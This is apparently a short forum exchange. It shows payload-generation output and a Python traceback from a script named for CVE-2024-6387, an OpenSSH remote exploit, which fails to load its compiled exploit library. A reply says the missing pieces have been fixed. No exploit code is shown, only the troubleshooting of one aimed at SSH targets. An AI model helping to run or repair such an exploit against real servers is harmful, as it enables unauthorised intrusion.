[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of c file: 584 bytes

Traceback (most recent call last):
File "/root/cve20246387-ssh-2.py", line 419, in <module>
main()
File "/root/cve20246387-ssh-2.py", line 411, in main
exploit_vulnerability(targets, port, nic)
File "/root/cve20246387-ssh-2.py", line 335, in exploit_vulnerability
lib = ctypes.CDLL('./exploit.so')
^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3.11/ctypes/__init__.py", line 376, in __init__
self._handle = _dlopen(self._name, mode)
^^^^^^^^^^^^^^^^^^^^^^^^^
OSError: ./exploit.so: undefined symbol: send_ssh_version

Thank you.
Hi J4ck, sorry for missing share. I fixed all missings and it looks like it will work fine
 
Top